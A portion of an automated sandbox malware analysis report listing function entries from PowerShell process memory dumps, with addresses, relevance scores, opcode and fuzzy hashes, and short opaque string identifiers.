                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: af74f00b3807f96f84d0cb13147996254997cf042403af4b382c08b81633e07e
                                  • Instruction ID: a9828a2d6fcb0dd0a68efef8c58e418a34ac545b9df65df751c4c7b0f9f90255
                                  • Opcode Fuzzy Hash: af74f00b3807f96f84d0cb13147996254997cf042403af4b382c08b81633e07e
                                  • Instruction Fuzzy Hash: 9A2116B4A042099FCB04CF99C9809AEFBF5FF49310B148599E909E7761C731EC51DBA4
                                  Function 07280C08 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 45b28a956d3245d8c5dc5b5a60a6ddd359872f543bfc9693602e7387ca4e3014
                                  • Instruction ID: 50017f35fa61dca9b57e69dfe669f9d37571a482b90ec172f11a9b9e17ff8e59
                                  • Opcode Fuzzy Hash: 45b28a956d3245d8c5dc5b5a60a6ddd359872f543bfc9693602e7387ca4e3014
                                  • Instruction Fuzzy Hash: E801427632031B8BC7B46DAAD40017AB79ADFC6622F14C43EE849CB690DA33C80DC360
                                  Function 04563975 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b7c0de7124e7135c2730c74a2b8c5cce431e26942dff06a3c3f2294b61d3f3f
                                  • Instruction ID: 16cd6b2899c684c58af407551e92503b8020ac79592809ae0f705df1e4f36f2b
                                  • Opcode Fuzzy Hash: 3b7c0de7124e7135c2730c74a2b8c5cce431e26942dff06a3c3f2294b61d3f3f
                                  • Instruction Fuzzy Hash: B011E5B1A04244DFCB05CF58C8905ADFBB1FF89304B1584DAC85ADB662C736EC42DB50
                                  Function 0456F0DB Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39f8cba9abe1bf05b3103939f5de125f3cafefb48d96ddf2678edbba8f45c4dc
                                  • Instruction ID: 8b12fc601b4936561eb03bf20cb42176d40c86f60f72ff2354c2883d670339a8
                                  • Opcode Fuzzy Hash: 39f8cba9abe1bf05b3103939f5de125f3cafefb48d96ddf2678edbba8f45c4dc
                                  • Instruction Fuzzy Hash: D911D232D00249DBEF24DA94F9987ECB771BB4435DF24102AC012B7190EB3468CAEF16
                                  Function 00BAD01D Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3325362343.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_bad000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d946e77ce226f8f3591df086ca2f24eb1bcf7f6b64ef67b34968464e53e70852
                                  • Instruction ID: 8e16a4a30b0bbf80b31321499c4e5fd405842896fb4591f9716320ae58523704
                                  • Opcode Fuzzy Hash: d946e77ce226f8f3591df086ca2f24eb1bcf7f6b64ef67b34968464e53e70852
                                  • Instruction Fuzzy Hash: EC01F7711083409ED7308A29C9C4B67BFD8EF47320F18C4AAED4A0A646C2799842CAB1
                                  Function 00BAD006 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3325362343.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_bad000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd1b33cd9b0276919e835792c1a3e9b6f03230b2ae5e30360aeeda6105599f93
                                  • Instruction ID: 15f229ac766de29aa65aef330fafd87e9d6a0ecc13f64db5a17222213e7e4c32
                                  • Opcode Fuzzy Hash: cd1b33cd9b0276919e835792c1a3e9b6f03230b2ae5e30360aeeda6105599f93
                                  • Instruction Fuzzy Hash: E1015E7250E3C09ED7228B258894B56BFB4EF53224F19C0DBD9888F6A7C2699845C772
                                  Function 0728335C Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6569043173957d3ab38f49e156ede82ca818a76afaca558ed7708820d6f03025
                                  • Instruction ID: 2ab69af2b02ea012ef1559d9f49a28d2d2bfee2873762135d884daa2b8d8d6d5
                                  • Opcode Fuzzy Hash: 6569043173957d3ab38f49e156ede82ca818a76afaca558ed7708820d6f03025
                                  • Instruction Fuzzy Hash: 35F08CB121E3828FD752DA20C860845BF629F93611B1D80CBD4848F1E3DA77A942D792

                                  Non-executed Functions

                                  Function 0728C2B0 Relevance: 14.1, Strings: 11, Instructions: 363COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                  • API String ID: 0-2004741541
                                  • Opcode ID: 02b7a727b338edbca524b219ab20fc5b14c18372ae13ba4c8699d836e7745b33
                                  • Instruction ID: da2aad0cea931f2b0d94d4299ed856c6dffbb33af3cd9e736f725a1fbc3950d3
                                  • Opcode Fuzzy Hash: 02b7a727b338edbca524b219ab20fc5b14c18372ae13ba4c8699d836e7745b33
                                  • Instruction Fuzzy Hash: 86C1F7B172520BCFCB54AF28C4006AA77A5EF85320F14C5BAD8558B2D1DB36C9C5C7B1
                                  Function 0728D78D Relevance: 14.0, Strings: 11, Instructions: 289COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q$(cq$(cq$(cq$(cq
                                  • API String ID: 0-3029092631
                                  • Opcode ID: 30fab6ece2f590d7e0ca88dc44038cae5175fc92809ae372255ff50cbaee0340
                                  • Instruction ID: 8a886ab41fa7126934ae415b7f0067fb6edb5fd6ff240c96dfe46308958dada3
                                  • Opcode Fuzzy Hash: 30fab6ece2f590d7e0ca88dc44038cae5175fc92809ae372255ff50cbaee0340
                                  • Instruction Fuzzy Hash: 2FA128B1B21206DFDB64AF68C940B6ABBA6BF8C310F148455D8059F3D4CB72DD49C7A1
                                  Function 07282548 Relevance: 12.8, Strings: 10, Instructions: 299COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                  • API String ID: 0-267665775
                                  • Opcode ID: 0d24ebc74474f9c8c76e35d9a8f7add8e9cf9a78313965cff695eeac68656455
                                  • Instruction ID: befe8eb54eb9bc17593a37cadf56c781eabdf82ece83fd49c78e1592272346c7
                                  • Opcode Fuzzy Hash: 0d24ebc74474f9c8c76e35d9a8f7add8e9cf9a78313965cff695eeac68656455
                                  • Instruction Fuzzy Hash: C7A167B0736217CFCBA9AA39885022A7BE5FF81310F18847AD845CB2D5DB76C845C7A1
                                  Function 0728CF15 Relevance: 11.5, Strings: 9, Instructions: 209COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                                  • API String ID: 0-3118609902
                                  • Opcode ID: 3cd9b3d613343c5bd91234a6788e9e1da499ee02de99555ff7c87586d6f9f709
                                  • Instruction ID: ebc9e6f6c7d370a7bac24de41d55d00438f91ec9ef5bc44288608c5a3320f3e9
                                  • Opcode Fuzzy Hash: 3cd9b3d613343c5bd91234a6788e9e1da499ee02de99555ff7c87586d6f9f709
                                  • Instruction Fuzzy Hash: 9B7149B0B31216CFDB68AF38C85066ABBA2EF88711F548456D8119B2D5DB32DC49C7A1
                                  Function 072842E8 Relevance: 10.5, Strings: 8, Instructions: 491COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                  • API String ID: 0-3118171705
                                  • Opcode ID: eb816cfebf2ca5e3fcb2b2f7a7a18bc8506da49f99656cb3fc11eea693db8624
                                  • Instruction ID: 04d6454e0744073378c27164f6a61afeeb9d640e4989878a1872bcfba2c97b98
                                  • Opcode Fuzzy Hash: eb816cfebf2ca5e3fcb2b2f7a7a18bc8506da49f99656cb3fc11eea693db8624
                                  • Instruction Fuzzy Hash: B8F158B17263878FCB55BF79C88066ABBE5AF81211F28847BD844CB291DB36C841C761
                                  Function 07281EB8 Relevance: 10.4, Strings: 8, Instructions: 385COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$t~pq$$]q$$]q$$]q
                                  • API String ID: 0-462330472
                                  • Opcode ID: a72d5396a6cc4edddd159576b9c2888280313248b80fbaa35f6854513738d9c1
                                  • Instruction ID: efed7bd5c81c9ee3c394dc0ef4739b71ee9ae8d2672b3f74b797881cbacd9c7c
                                  • Opcode Fuzzy Hash: a72d5396a6cc4edddd159576b9c2888280313248b80fbaa35f6854513738d9c1
                                  • Instruction Fuzzy Hash: 94C17AB1B21206CFCB64AF78885026EBBE6FF95311F24847AD555CB2D1DB32C912C7A1
                                  Function 0728D26D Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$$]q$$]q$$]q
                                  • API String ID: 0-2353078639
                                  • Opcode ID: 51026f47f5429438aa49c98f44aeddc5ca911a06a576afcc753a48741421666d
                                  • Instruction ID: a977e2a1925e0274304e7ee4f70d9e3b8e1d33a066f4e0817b4dcd0a82f85b5a
                                  • Opcode Fuzzy Hash: 51026f47f5429438aa49c98f44aeddc5ca911a06a576afcc753a48741421666d
                                  • Instruction Fuzzy Hash: A53148F2B26247CFCB696A69D450276B7E5AFCE111B24446BC841CB1CACA37C40DCB62
                                  Function 07288880 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$tP]q$$]q$$]q$$]q
                                  • API String ID: 0-2702571027
                                  • Opcode ID: 5626dbe074cbb764924791e1dfe73bec1dda0ad50bdde5a9a92797b6cd3e7593
                                  • Instruction ID: 3b5728e26052e7fea1b91a8a86d4f327c7dee603cd8840aac48b9994371bb5f1
                                  • Opcode Fuzzy Hash: 5626dbe074cbb764924791e1dfe73bec1dda0ad50bdde5a9a92797b6cd3e7593
                                  • Instruction Fuzzy Hash: 183117B1A32207EBDBB4AE08C540B69B7E2BB45711F88C066D9155F3C0C773E940CB52
                                  Function 0728D016 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                  • API String ID: 0-1723543176
                                  • Opcode ID: 9100bdb55241b4da6cf07f17997eb0fc4ecb87f0a556daaf699f896ded8feeb4
                                  • Instruction ID: 9352fedb3d755d34b88e26b311fab5f8942636f48f80e72d007f5148f4b826b0
                                  • Opcode Fuzzy Hash: 9100bdb55241b4da6cf07f17997eb0fc4ecb87f0a556daaf699f896ded8feeb4
                                  • Instruction Fuzzy Hash: 1431D3B0B21115DFD768EF68C880A69BBA2EF8C714F54C555E815AB3D0C772EC46CB90
                                  Function 07282710 Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$$]q$$]q$$]q$$]q
                                  • API String ID: 0-2705583504
                                  • Opcode ID: 9253306d8e31adae2d703bea57b014d4bdf31672dd209dc20ea0f767fc71831e
                                  • Instruction ID: 92d7a72267da29fccb19ba7523d713d0502d1836c9445d053e2842ead73016a6
                                  • Opcode Fuzzy Hash: 9253306d8e31adae2d703bea57b014d4bdf31672dd209dc20ea0f767fc71831e
                                  • Instruction Fuzzy Hash: 0421A1F1632207DBDFB4AE0AC64462177E4BF41651F584066EC048B1D5C777D880CBA1
                                  Function 0728C780 Relevance: 5.5, Strings: 4, Instructions: 466COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (o]q$(o]q$(o]q$(o]q
                                  • API String ID: 0-1261621458
                                  • Opcode ID: 60bf5aba484c0497ca6bc097effe71d9485e52f1ecb4158744943be2f3b892f6
                                  • Instruction ID: 4995289d916997353ce9e5dfd1288d624afc0c98fa67e5fea7c998e37a9757d6
                                  • Opcode Fuzzy Hash: 60bf5aba484c0497ca6bc097effe71d9485e52f1ecb4158744943be2f3b892f6
                                  • Instruction Fuzzy Hash: 3CF155B1725306CFDB55AF28C85076ABBA1EF85311F14C4EAE4458B2D1DB32C885CBB1
                                  Function 0728E490 Relevance: 5.4, Strings: 4, Instructions: 374COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q
                                  • API String ID: 0-1785108022
                                  • Opcode ID: bb5f9df02eae6a0b5005aa097a490d5971027128cee35deb13f3019286ecb1a1
                                  • Instruction ID: d4283f13fab5759bc0cb8e468ec4c12a24a524a47a7374dbe2853ac8d300b995
                                  • Opcode Fuzzy Hash: bb5f9df02eae6a0b5005aa097a490d5971027128cee35deb13f3019286ecb1a1
                                  • Instruction Fuzzy Hash: 02E1D0B0F212059FD764EB68C951B6EBBA3EFC4308F158828D8116B395CB76EC458B91
                                  Function 072863E8 Relevance: 5.3, Strings: 4, Instructions: 265COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$tP]q$tP]q
                                  • API String ID: 0-3637193552
                                  • Opcode ID: 55c748f7c2ee4df9c12d1e6a9144fd196627e6f807f83bff603cc8a0823518ef
                                  • Instruction ID: cb9d406a751c2f48482257d3ba3aa28b7937f78d46940374a7eb2df4ce46698c
                                  • Opcode Fuzzy Hash: 55c748f7c2ee4df9c12d1e6a9144fd196627e6f807f83bff603cc8a0823518ef
                                  • Instruction Fuzzy Hash: 93918CB17353438FCB656A78881476ABBF2AF81310F1484AAD545CB2D7DB7AC804C7A1
                                  Function 07281E98 Relevance: 5.1, Strings: 4, Instructions: 130COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$$]q$$]q
                                  • API String ID: 0-978391646
                                  • Opcode ID: 9849b7b53be3b17b56ed4c103dc625290d0a926f2cf4a5c5a03f4993581cc4a8
                                  • Instruction ID: 57d879112995d4120f6c805c4f2ca18d3c2357ea2f12a9aa572771b84cf5f54f
                                  • Opcode Fuzzy Hash: 9849b7b53be3b17b56ed4c103dc625290d0a926f2cf4a5c5a03f4993581cc4a8
                                  • Instruction Fuzzy Hash: 8141B7B0A2A38BDFCB656F2488402657BF1BF52310F18449FC5948B1D2C7368863C792
                                  Function 07281070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $]q$$]q$$]q$$]q
                                  • API String ID: 0-858218434
                                  • Opcode ID: 5f8c41d4925a13c987fe52be9346b87f1f6d4e5054f3fcc257137e90612b5944
                                  • Instruction ID: 1bc8f4c7b1daf4abf23bffb27dd3fe23d6b5552f476f6a4c0176e6d90169e35e
                                  • Opcode Fuzzy Hash: 5f8c41d4925a13c987fe52be9346b87f1f6d4e5054f3fcc257137e90612b5944
                                  • Instruction Fuzzy Hash: 812157B133024B9BDBB8656A4C41B27B6DADBC0715F20843EA945CB2C5CDB7C822C360
                                  Function 07288B10 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $]q$$]q$$]q$$]q
                                  • API String ID: 0-858218434
                                  • Opcode ID: 9fcfa5154faf060f91974fe778d15dfa06d041ac1f9d8edef573b0d8c46ed6f7
                                  • Instruction ID: a89d3d9897f5278b1f18fe4ccbaeb5cb0521213adfa3060727cc2b4a08457656
                                  • Opcode Fuzzy Hash: 9fcfa5154faf060f91974fe778d15dfa06d041ac1f9d8edef573b0d8c46ed6f7
                                  • Instruction Fuzzy Hash: 9D110FF1A32307DBDBB8AE598940666B7F0AFC5210F98847AC804D7381E733C884C792
                                  Function 07281CC0 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$$]q$$]q
                                  • API String ID: 0-978391646
                                  • Opcode ID: cb4d464852117e0b0290cb68a972ef22e62e6f5141ac8e1c8a1cdd82d68531b9
                                  • Instruction ID: 898b2030d57cd837322806b1b277a7aa207bfa74fa636ef8ddea0f1469699648
                                  • Opcode Fuzzy Hash: cb4d464852117e0b0290cb68a972ef22e62e6f5141ac8e1c8a1cdd82d68531b9
                                  • Instruction Fuzzy Hash: DE01B57171E38A8FC37F122C58203556FB25F83510B5A04D7C091DB2D7DA1A4C1683A6